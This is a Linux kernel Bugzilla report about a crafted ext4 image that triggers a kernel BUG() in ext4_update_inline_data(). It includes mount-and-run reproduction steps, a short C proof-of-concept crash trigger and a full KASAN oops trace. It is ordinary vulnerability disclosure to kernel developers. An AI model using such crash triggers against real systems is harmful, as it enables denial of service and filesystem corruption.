https://bugzilla.kernel.org/show_bug.cgi?id=200005 Bug ID: 200005 Summary: BUG() triggered in ext4_update_inline_data() when mounting and writing to a crafted ext4 image Product: File System Version: 2.5 Kernel Version: 4.17 Hardware: All OS: Linux Tree: Mainline Status: NEW Severity: normal Priority: P1 Component: ext4 Assignee: fs_ext4@xxxxxxxxxxxxxxxxxxxx Reporter: wen.xu@xxxxxxxxxx Regression: No Created attachment 276409 --> https://bugzilla.kernel.org/attachment.cgi?id=276409&action=edit The (compressed) crafted image which causes crash - Overview BUG() triggered in ext4_update_inline_data() when mounting and writing to a crafted ext4 image - Reproduce (ext4 dev branch) # mkdir mnt # mount -t ext4 155.img mnt # gcc -o poc poc.c # ./poc ./mnt - POC (poc.c) #define _GNU_SOURCE #include <sys/types.h> #include <sys/mount.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/xattr.h> #include <dirent.h> #include <errno.h> #include <error.h> #include <fcntl.h> #include <stdio.h> #include <stdlib.h> #include <string.h> #include <unistd.h> #include <linux/falloc.h> #include <linux/loop.h> static void activity(char *mpoint) { char *foo_bar_baz; int err; static int buf[8192]; memset(buf, 0, sizeof(buf)); err = asprintf(&foo_bar_baz, "%s/foo/bar/baz", mpoint); int fd = open(foo_bar_baz, O_RDWR | O_TRUNC, 0777); if (fd >= 0) { write(fd, (char *)buf, 517); close(fd); } } int main(int argc, char *argv[]) { activity(argv[1]); return 0; } - Kernel message [ 374.183903] EXT4-fs (loop0): mounted filesystem with ordered data mode. Opts: (null) [ 379.182404] EXT4-fs error (device loop0): ext4_mb_generate_buddy:746: group 0, block bitmap and bg descriptor inconsistent: 6607 vs 6416 free clusters [ 379.186036] JBD2: Spotted dirty metadata buffer (dev = loop0, blocknr = 1). There's a risk of filesystem corruption in case of system crash. [ 379.186215] ------------[ cut here ]------------ [ 379.186218] kernel BUG at fs/ext4/inline.c:338! [ 379.187299] invalid opcode: 0000 [#1] SMP KASAN PTI [ 379.188335] Modules linked in: snd_hda_codec_generic snd_hda_intel snd_hda_codec snd_hwdep snd_hda_core snd_pcm snd_timer snd i2c_piix4 mac_hid soundcore ib_iser rdma_cm iw_cm ib_cm ib_core iscsi_tcp libiscsi_tcp libiscsi scsi_transport_iscsi autofs4 btrfs zstd_decompress zstd_compress xxhash raid10 raid456 async_raid6_recov async_memcpy async_pq async_xor async_tx xor raid6_pq raid1 raid0 multipath linear 8139too qxl drm_kms_helper syscopyarea sysfillrect crct10dif_pclmul sysimgblt fb_sys_fops ttm crc32_pclmul drm aesni_intel aes_x86_64 crypto_simd cryptd glue_helper pata_acpi 8139cp floppy mii [ 379.199273] CPU: 0 PID: 1381 Comm: a.out Not tainted 4.17.0-rc4+ #5 [ 379.200583] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 379.202585] RIP: 0010:ext4_update_inline_data+0x333/0x340 [ 379.203708] RSP: 0018:ffff8801f0db74d0 EFLAGS: 00010286 [ 379.204814] RAX: 00000000ffffffc3 RBX: 1ffff1003e1b6e9e RCX: ffffffff86557b00 [ 379.206286] RDX: 0000000000000003 RSI: dffffc0000000000 RDI: ffff8801f0db7570 [ 379.207758] RBP: ffff8801f0db75f8 R08: ffffffff87738080 R09: 0000000000000000 [ 379.209238] R10: 0000000000000001 R11: ffffed003d7d3cb4 R12: ffff8801ec0c1d08 [ 379.210710] R13: 0000000000000205 R14: ffff8801ec0c1fd8 R15: ffff8801ebe2cf40 [ 379.212184] FS: 00007f5e27538700(0000) GS:ffff8801f7000000(0000) knlGS:0000000000000000 [ 379.213849] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033 [ 379.215038] CR2: 000000000205c158 CR3: 00000001e45aa000 CR4: 00000000000006f0 [ 379.216526] Call Trace: [ 379.217060] ? ext4_read_inline_page+0x2e0/0x2e0 [ 379.218054] ? kasan_check_write+0x14/0x20 [ 379.218918] ? ext4_convert_inline_data_nolock+0x7b0/0x7b0 [ 379.220063] ? jbd2__journal_start+0x19d/0x300 [ 379.221008] ext4_prepare_inline_data+0xcb/0xe0 [ 379.221954] ext4_try_to_write_inline_data+0x3c9/0x9c0 [ 379.223024] ? __kasan_slab_free+0x151/0x1a0 [ 379.223916] ? jbd2_journal_stop+0x23d/0x840 [ 379.241577] ? kasan_slab_free+0xe/0x10 [ 379.242394] ? ext4_readpage_inline+0x180/0x180 [ 379.243348] ? __ext4_get_inode_loc+0x231/0x680 [ 379.244329] ? strlen+0x25/0x40 [ 379.245018] ? ext4_ind_trans_blocks+0x2a/0x50 [ 379.245952] ? ext4_meta_trans_blocks+0xf3/0x130 [ 379.246923] ext4_write_begin+0x662/0x7c0 [ 379.247770] ? ext4_truncate+0x780/0x780 [ 379.248618] ? ext4_xattr_get+0x135/0x4d0 [ 379.249466] ext4_da_write_begin+0x414/0x610 [ 379.250381] ? csum_and_copy_to_iter+0x830/0x830 [ 379.251356] ? ext4_write_begin+0x7c0/0x7c0 [ 379.252237] ? ext4_xattr_security_get+0x1f/0x30 [ 379.253231] ? __vfs_getxattr+0x67/0x90 [ 379.254064] generic_perform_write+0x192/0x320 [ 379.255006] ? __bpf_trace_filemap_set_wb_err+0x10/0x10 [ 379.256113] ? file_update_time+0x1d2/0x270 [ 379.257032] ? unwind_dump+0x290/0x290 [ 379.257830] ? current_time+0x80/0x80 [ 379.258608] __generic_file_write_iter+0x261/0x2e0 [ 379.259625] ext4_file_write_iter+0x1dd/0x800 [ 379.260562] ? ext4_file_mmap+0x150/0x150 [ 379.261412] ? save_stack+0xb5/0xd0 [ 379.262173] ? aa_path_link+0x210/0x210 [ 379.262992] ? kasan_slab_free+0xe/0x10 [ 379.263804] ? kmem_cache_free+0x89/0x1e0 [ 379.264673] ? putname+0x80/0x90 [ 379.265364] ? do_sys_open+0x22e/0x2c0 [ 379.266159] ? __x64_sys_open+0x4c/0x60 [ 379.266988] ? do_syscall_64+0x78/0x170 [ 379.267816] ? entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 379.268942] ? update_load_avg+0x898/0xc70 [ 379.269812] ? iov_iter_init+0x82/0xc0 [ 379.270610] __vfs_write+0x294/0x3f0 [ 379.271371] ? kernel_read+0xa0/0xa0 [ 379.272132] ? common_file_perm+0x11b/0x2e0 [ 379.273028] ? may_open_dev+0x50/0x50 [ 379.273807] ? apparmor_task_setrlimit+0x270/0x270 [ 379.274814] ? rw_verify_area+0x78/0x140 [ 379.275646] vfs_write+0xf9/0x260 [ 379.276354] ksys_write+0xb4/0x140 [ 379.277088] ? __ia32_sys_read+0x50/0x50 [ 379.277931] ? task_work_run+0x4d/0xf0 [ 379.278729] __x64_sys_write+0x43/0x50 [ 379.279523] do_syscall_64+0x78/0x170 [ 379.280300] entry_SYSCALL_64_after_hwframe+0x44/0xa9 [ 379.281396] RIP: 0033:0x7f5e2704a2c0 [ 379.282163] RSP: 002b:00007ffdf7c59718 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 [ 379.283754] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5e2704a2c0 [ 379.285251] RDX: 0000000000000205 RSI: 0000000000602140 RDI: 0000000000000003 [ 379.286731] RBP: 00007ffdf7c59880 R08: 0000000000000003 R09: 0000000000000000 [ 379.288210] R10: 000000000000086f R11: 0000000000000246 R12: 0000000000400c20 [ 379.289699] R13: 00007ffdf7c59980 R14: 0000000000000000 R15: 0000000000000000 [ 379.291177] Code: f5 ea ff 48 8b 7d 80 8b 85 f0 fe ff ff 48 85 ff 0f 84 d5 fd ff ff e8 1d 59 f5 ff 8b 85 f0 fe ff ff e9 c5 fd ff ff 45 31 c9 eb ca <0f> 0b e8 16 c4 be ff 66 0f 1f 44 00 00 66 66 66 66 90 55 48 b8 [ 379.295101] RIP: ext4_update_inline_data+0x333/0x340 RSP: ffff8801f0db74d0 [ 379.296603] ---[ end trace 9f703e0d0e15b354 ]--- [ 379.298130] ================================================================== [ 379.299698] BUG: KASAN: stack-out-of-bounds in arch_tlb_gather_mmu+0x52/0x170 [ 379.301219] Write of size 8 at addr ffff8801f0db7d10 by task a.out/1381 [ 379.302947] CPU: 0 PID: 1381 Comm: a.out Tainted: G D 4.17.0-rc4+ #5 [ 379.304630] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS Ubuntu-1.8.2-1ubuntu1 04/01/2014 [ 379.308030] Call Trace: [ 379.308592] dump_stack+0x7b/0xb5 [ 379.309306] print_address_description+0x70/0x290 [ 379.310292] kasan_report+0x291/0x390 [ 379.311066] ? arch_tlb_gather_mmu+0x52/0x170 [ 379.311987] __asan_store8+0x57/0x90 [ 379.312762] arch_tlb_gather_mmu+0x52/0x170 [ 379.313644] tlb_gather_mmu+0x12/0x40 [ 379.314421] exit_mmap+0x102/0x280 [ 379.315146] ? __ia32_sys_munmap+0x50/0x50 [ 379.316018] ? exit_aio+0x98/0x230 [ 379.316761] ? __x32_compat_sys_io_submit+0x100/0x100 [ 379.317832] ? taskstats_exit+0x1f4/0x640 [ 379.318684] ? kasan_check_read+0x11/0x20 [ 379.319545] ? mm_update_next_owner+0x322/0x380 [ 379.320516] mmput+0x8b/0x1d0 [ 379.321151] do_exit+0x43a/0x1390 [ 379.321857] ? mm_update_next_owner+0x380/0x380 [ 379.322808] ? ksys_write+0xb4/0x140 [ 379.323566] ? __ia32_sys_read+0x50/0x50 [ 379.324406] ? task_work_run+0x4d/0xf0 [ 379.325200] ? __x64_sys_write+0x43/0x50 [ 379.326030] rewind_stack_do_exit+0x17/0x20 [ 379.326911] RIP: 0033:0x7f5e2704a2c0 [ 379.327665] RSP: 002b:00007ffdf7c59718 EFLAGS: 00000246 ORIG_RAX: 0000000000000001 [ 379.329246] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f5e2704a2c0 [ 379.330725] RDX: 0000000000000205 RSI: 0000000000602140 RDI: 0000000000000003 [ 379.332201] RBP: 00007ffdf7c59880 R08: 0000000000000003 R09: 0000000000000000 [ 379.333682] R10: 000000000000086f R11: 0000000000000246 R12: 0000000000400c20 [ 379.336032] R13: 00007ffdf7c59980 R14: 0000000000000000 R15: 0000000000000000 [ 379.337895] The buggy address belongs to the page: [ 379.339194] page:ffffea0007c36dc0 count:0 mapcount:0 mapping:0000000000000000 index:0x0 [ 379.340920] flags: 0x2ffff0000000000() [ 379.341728] raw: 02ffff0000000000 0000000000000000 0000000000000000 00000000ffffffff [ 379.343340] raw: 0000000000000000 ffffea0007c37160 ffff8801f6d90000 0000000000000000 [ 379.350621] page dumped because: kasan: bad access detected [ 379.352812] Memory state around the buggy address: [ 379.353822] ffff8801f0db7c00: 00 00 00 00 00 00 00 f4 f4 00 00 00 00 00 00 00 [ 379.355322] ffff8801f0db7c80: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 00 00 00 [ 379.357009] >ffff8801f0db7d00: 00 00 f2 00 00 00 00 00 00 00 00 00 00 f4 f4 f4 [ 379.358514] ^ [ 379.359535] ffff8801f0db7d80: f3 f3 f3 f3 00 00 00 00 f4 f3 f3 f3 f3 00 00 00 [ 379.361074] ffff8801f0db7e00: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f4 f4 f4 [ 379.362581] ================================================================== - Location https://elixir.bootlin.com/linux/v4.17/source/fs/ext4/inline.c#L332 error = ext4_xattr_ibody_find(inode, &i, &is); if (error) goto out; BUG_ON(is.s.not_found); Reported by Wen Xu from SSLab at Gatech. -- You are receiving this mail because: You are watching the assignee of the bug.
